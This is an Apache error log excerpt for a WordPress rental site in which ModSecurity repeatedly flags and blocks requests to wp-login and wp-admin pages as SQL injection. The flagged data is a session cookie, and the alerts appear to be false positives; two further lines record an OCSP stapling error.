[Mon May 11 22:29:12.037505 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8GHo_DFxNSZVmaX3R-QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:12.037781 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8GHo_DFxNSZVmaX3R-QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:12.639312 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8GHo_DFxNSZVmaX3R-QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:13.047122 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8GXo_DFxNSZVmaX3R-wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:13.047425 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8GXo_DFxNSZVmaX3R-wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:13.637967 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8GXo_DFxNSZVmaX3R-wAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:13.836315 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8GXo_DFxNSZVmaX3R_AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:13.836600 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8GXo_DFxNSZVmaX3R_AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:14.395840 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8GXo_DFxNSZVmaX3R_AAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:14.560070 2026] [ssl:error] [pid 1606352:tid 1606434] (EAI 2)Name or service not known: [client 77.78.224.29:21669] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 22:29:14.560105 2026] [ssl:error] [pid 1606352:tid 1606434] AH01941: stapling_renew_response: responder error
[Mon May 11 22:29:14.658634 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8Gno_DFxNSZVmaX3R_QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:14.658917 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8Gno_DFxNSZVmaX3R_QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:15.011661 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8Gno_DFxNSZVmaX3R_QAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:15.631220 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8G3o_DFxNSZVmaX3R_gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:15.631489 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8G3o_DFxNSZVmaX3R_gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:16.213590 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8G3o_DFxNSZVmaX3R_gAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:16.946364 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8HHo_DFxNSZVmaX3SAAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:16.946645 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8HHo_DFxNSZVmaX3SAAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:17.553458 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8HHo_DFxNSZVmaX3SAAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:18.421399 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8Hno_DFxNSZVmaX3SAwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:18.421672 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI8Hno_DFxNSZVmaX3SAwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:19.051086 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8Hno_DFxNSZVmaX3SAwAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:20.236537 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8IHo_DFxNSZVmaX3SBgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:20.236830 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI8IHo_DFxNSZVmaX3SBgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:20.815312 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8IHo_DFxNSZVmaX3SBgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:21.040305 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8IXo_DFxNSZVmaX3SCAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:21.040587 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI8IXo_DFxNSZVmaX3SCAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:21.624530 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8IXo_DFxNSZVmaX3SCAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:21.838670 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8IXo_DFxNSZVmaX3SCgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:21.839000 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI8IXo_DFxNSZVmaX3SCgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:22.215865 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8IXo_DFxNSZVmaX3SCgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:23.039967 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8I3o_DFxNSZVmaX3SDAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:23.040258 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI8I3o_DFxNSZVmaX3SDAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:23.633047 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI8I3o_DFxNSZVmaX3SDAAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:24.236359 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8JHo_DFxNSZVmaX3SDgAAAMg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:29:24.236687 2026] [security2:error] [pid 1606352:tid 1606427] [client 103.59.161.151:49531] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI8JHo_DFxNSZVmaX3SDgAAAMg"], referer: https://rentparadise.fr/wp-login.php
